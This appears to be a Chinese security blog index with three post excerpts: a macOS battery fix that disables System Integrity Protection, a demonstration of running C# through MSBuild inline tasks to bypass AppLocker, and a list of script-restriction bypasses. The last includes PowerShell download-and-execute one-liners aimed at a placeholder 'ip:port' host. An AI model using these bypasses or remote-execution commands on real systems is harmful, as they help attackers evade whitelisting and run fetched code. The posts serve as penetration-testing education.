发表于 | 分类于

15版的macbook pro 更新El Capitan之后,每天电脑盒盖之后还耗费了挺多电,差不多一晚平均3%-5%,一直再想办法解决,也查看了好多方式,一直没有什么效果,经过多次尝试,终于解决了。妈妈再也不用担心电脑继续耗电了。所以现在分享一下这个方法。

首先可以查看一下是什么在唤醒电脑:

1
syslog | grep -i "wake reason"

我的电脑晚上老是被 RTC (Alarm) 唤醒,差不多两小时一次。该怎么解决呢? 很简单。

首先重启电脑进入Recovery。
再重启听到开机的那个声音的时候,按住comman+R 直到苹果的图标出现

之后找到终端,然后输入以下命令:

1
csrutil disable

阅读全文 »

发表于 | 分类于

前一篇文章总结了几种bypass Applocker的方法,最近又在 @subTee 博客学到了新的方法,所以在这里进行一下简单的分享。

首先介绍一下MSBuild,MSBuild 是 Microsoft 和 Visual Studio的生成系统。默认是存在于windows系统上的。那么怎么使用msbuild执行我们的代码呢? 关于细节可以看这里:

https://msdn.microsoft.com/en-us/library/dd722601.aspx

@subTee 给出了几个POC。

Demo

测试Hello World:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
   <!-- Author: Casey Smith, Twitter: @subTee -->
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
   <FragmentExample />
   <ClassExample />
  </Target>
  <UsingTask
    TaskName="FragmentExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <ParameterGroup/>
    <Task>
      <Using Namespace="System" />  
      <Code Type="Fragment" Language="cs">
        <![CDATA[
                Console.WriteLine("Hello From a Code Fragment");        
        ]]>
      </Code>
    </Task>
    </UsingTask>
    <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
    <!-- <Reference Include="System.IO" /> Example Include -->      
      <Code Type="Class" Language="cs">
        <![CDATA[
            using System;
            using Microsoft.Build.Framework;
            using Microsoft.Build.Utilities;
                
            public class ClassExample :  Task, ITask
            {
                public override bool Execute()
                {
                    Console.WriteLine("Hello From a Class.");
                    return true;
                }
            }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

阅读全文 »

发表于 | 分类于

from:
https://www.youtube.com/watch?v=z04NXAkhI4k

0x00 Command 和 Powershell 没被禁用,脚本被禁用

1463634732723.png

1、直接使用cmd powershell执行

Powershell:

1
IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

Command:

1
powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

2、管道

Powershell:

1
Get-Content script.ps1 | iex

Command:

1
cmd.exe /K < payload.bat

阅读全文 »